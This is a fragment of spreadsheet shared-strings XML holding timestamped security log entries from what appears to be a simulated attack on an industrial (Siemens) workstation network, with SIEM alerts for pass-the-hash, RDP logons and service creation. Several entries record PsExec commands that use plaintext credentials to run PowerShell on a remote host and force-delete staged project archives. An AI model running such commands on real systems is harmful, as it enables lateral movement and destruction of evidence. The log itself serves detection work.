  </si>
  <si>
    <t>10.12.28.2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:09.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:09.275</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:09.338</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:10.652</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:10.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.073</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.293</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.432</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.818</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.820</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.839</t>
  </si>
  <si>
    <t>172.19.38.141</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:12.986</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:13.168</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:13.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:13.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:41.381</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:41.384</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:41.419</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe6_ Global\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:48.938</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:48.998</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:49.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:33.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:33.940</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:33.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:33.954</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:33.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:50.212</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:32:50.225</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:33:21.510</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:33:21.512</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:33:51.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:33:51.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:31.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:31.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:31.972</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS powershell.exe -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list.txt','C:\\Windows\\Temp\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:32.093</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:32.160</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:32.362</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:32.433</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:33.651</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:33.670</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:33.675</t>
  </si>
  <si>
    <t>\"powershell.exe\" -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list.txt','C:\\Windows\\Temp\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:34.001</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:34.283</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:34.778</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:36.517</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:37.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:34:42.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:03.865</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:03.974</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.003</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS powershell.exe -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list2.txt','C:\\Windows\\Temp\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.026</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.069</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.073</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.243</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.277</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.301</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:04.322</t>
  </si>
  <si>
    <t>\"powershell.exe\" -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list2.txt','C:\\Windows\\Temp\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:05.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:05.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:05.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:05.542</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:35:07.692</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:54.678</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:54.781</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:54.887</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:54.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.143</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.232</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.259</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.260</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.273</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:55.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:56.050</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:56.768</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:58.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:37:58.614</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:46.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.001</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.085</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS powershell.exe -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list.txt','C:\\Windows\\Tem2p\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.183</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.213</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.264</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:47.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:48.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:48.817</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:48.892</t>
  </si>
  <si>
    <t>\"powershell.exe\" -Command \"Remove-Item 'C:\\Windows\\Temp\\project_file_list.txt','C:\\Windows\\Tem2p\\siemens_project3.zip' -Force\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:48.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:49.019</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:49.417</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:49.457</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:38:52.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:01.241</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:01.250</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:01.259</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:01.273</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:56.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:39:56.732</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:20.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:21.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:21.542</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:21.550</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:24.757</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:34.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:41:54.610</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:45:54.355</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:45:54.376</t>
  </si>
  <si>
    <t>Attack Step 5</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:54.843</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:54.852</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Windows11EWS - NTLM authentication, possible pass-the-hash attack - Possible RDP connection. Verify that kali is allowed to perform RDP connections</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:54.902</t>
  </si>
  <si>
    <t>\\SystemRoot\\System32\\smss.exe 00000124 000000e8</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:55.080</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:55.135</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:55.224</t>
  </si>
  <si>
    <t>Sysmon - Suspicious Process - smss.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.030</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.082</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\WUDFHost.exe\" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-69295189-2cf8-4c6d-939f-d93ff264cb16 -SystemEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-f33cf728-5e89-4a4b-ab6b-2bd2164b7f5a -IoCancelEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-aa92b886-b579-4e74-953f-af19ff760979 -NonStateChangingEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-d0d412ba-488e-4dec-bb5c-0b650aabf201 -LifetimeId:8ecd1044-14d6-4c89-b7e8-81c514e4cead -DeviceGroupId: -HostArg:16</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.246</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.251</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.293</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.298</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x2 /state0:0xa3e67855 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:58.393</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:59.265</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:49:59.266</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000C28;0000000000001244;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:02.542</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.081</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.085</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.161</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.166</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.170</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.183</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.223</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.241</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.242</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.267</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.271</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.272</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:04.278</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:05.850</t>
  </si>
  <si>
    <t>User: WORKGROUP\Windows11EWS logged using Remote Desktop Connection (RDP) from ip:10.12.25.23.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:05.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:06.003</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:06.005</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:06.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:06.792</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:07.020</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:07.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:07.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:07.285</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\UserManagement\\BIN\\um.ess.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:08.894</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:09.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:09.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:09.474</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:09.650</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:09.897</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:10.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:10.450</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:10.505</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:10.746</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:10.975</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:11.178</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:11.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:11.885</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:12.039</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:12.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:12.344</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:12.399</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:12.989</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.150</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.152</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.475</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.778</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.935</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:13.999</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.101</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.212</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.287</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.376</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.428</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.451</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.470</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.509</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_d1ce13\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.647</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:14.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:16.153</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe8_ Global\\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:19.212</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:19.214</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:19.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:21.180</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:21.238</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:21.308</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:29.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:37.703</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:39.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:41.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:42.020</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:42.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:43.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:43.183</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:43.448</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:43.566</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:43.770</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:44.087</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:44.238</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:44.580</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:45.168</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:45.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:46.311</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:48.296</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:51.811</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:51.876</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\UnifiedAutomation\\UaExpert\\bin\\uaexpert.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:52.017</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:52.151</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:52.291</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:52.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:56.397</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:56.515</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:56.623</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:56.624</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:57.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:50:59.616</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:01.142</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:02.653</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:03.646</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000001300;0000000000001304;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:03.682</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:05.349</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:15.190</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:25.439</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:26.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:26.711</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:31.930</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:31.944</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:33.795</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:37.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:41.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:50.070</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:50.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:54.899</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:56.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:59.891</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=135.0.7049.115 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=135.0.3179.98 --initial-client-data=0x27c,0x280,0x284,0x278,0x268,0x7fff2e479240,0x7fff2e47924c,0x7fff2e479258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:51:59.946</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2260,i,10523690045595089126,8847648928729877960,262144 --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:00.087</t>
  </si>
  <si>
